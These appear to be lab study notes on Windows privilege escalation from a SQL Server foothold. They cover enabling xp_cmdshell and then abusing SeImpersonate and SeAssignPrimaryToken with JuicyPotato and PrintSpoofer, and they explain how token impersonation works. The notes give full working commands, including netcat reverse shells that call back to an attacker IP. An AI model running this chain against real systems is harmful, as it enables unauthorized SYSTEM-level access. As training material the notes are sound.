5. SeImpersonate and SeAssignPrimaryToken

MSSQL Privilege Escalation

mssqlclient.py sql_dev@10.129.43.30 -windows-auth

Enable xp_cmdshell (mssqlclient.py helper; it runs sp_configure 'show advanced options', 1 and sp_configure 'xp_cmdshell', 1 with RECONFIGURE, so the login needs sysadmin on the instance)

enable_xp_cmdshell

Execute commands using xp_cmdshell (commands run as the SQL Server service account; check which privileges it holds)

xp_cmdshell whoami
xp_cmdshell whoami /priv

Start netcat listener on the attacking host first (both JuicyPotato and PrintSpoofer below call back to it)

nc -lnvp 8443

Exploiting with JuicyPotato (-l is a free local port for the COM listener; -t * tries both CreateProcessWithTokenW, which needs SeImpersonate, and CreateProcessAsUser, which needs SeAssignPrimaryToken; on some builds a different CLSID must be given with -c)

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

Exploiting with PrintSpoofer (use on Windows 10 / Server 2016 and 2019 where JuicyPotato fails; needs only SeImpersonatePrivilege)

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

  • SeImpersonate Privilege:

    • "Impersonate a client after authentication": lets a process adopt (impersonate) the token of a client that connected to it, for example over a named pipe or RPC.

    • Abused for privilege escalation by the "Potato" family: coerce a SYSTEM component into authenticating to a listener you control, then impersonate its token.

  • SeAssignPrimaryToken Privilege:

    • "Replace a process level token": lets a process start a new process with an arbitrary primary token (CreateProcessAsUser), so an impersonated SYSTEM token can be turned into a full SYSTEM process.

  • Token Impersonation:

    • Every process runs with a primary token (user, groups, privileges); a thread can temporarily carry an impersonation token instead. Potato tools obtain a SYSTEM impersonation token and either use it directly or convert it into a primary token.

    • whoami /priv lists the privileges the token holds. "Disabled" only means not currently enabled; the tools enable it themselves, so holding the privilege is what matters.

  • Privilege Escalation via Service Accounts:

    • Service accounts that must impersonate their callers hold these privileges by default, so a foothold as such an account is usually one step from SYSTEM.

    • Examples: the SQL Server service account (via xp_cmdshell) and IIS application pool identities (via a web shell).

  • JuicyPotato:

    • Triggers DCOM activation of a SYSTEM service (BITS CLSID by default, selectable with -c) against a local listener and uses the captured token through CreateProcessWithTokenW (SeImpersonate) or CreateProcessAsUser (SeAssignPrimaryToken).

    • Does not work on Windows 10 1809 / Server 2019 and later, where the DCOM OXID-resolver trick it relies on was fixed.

  • PrintSpoofer:

    • Alternative for Windows 10 and Server 2016/2019: coerces the Print Spooler into connecting to a named pipe and impersonates it.

    • Needs only SeImpersonatePrivilege.

  • MSSQL Exploitation:

    • Using xp_cmdshell to gain code execution as the SQL Server service account.

    • Using mssqlclient.py (Impacket) with -windows-auth to connect to a SQL server.

  • Reverse Shells:

    • Using netcat to catch reverse shells (start the listener before launching the exploit).
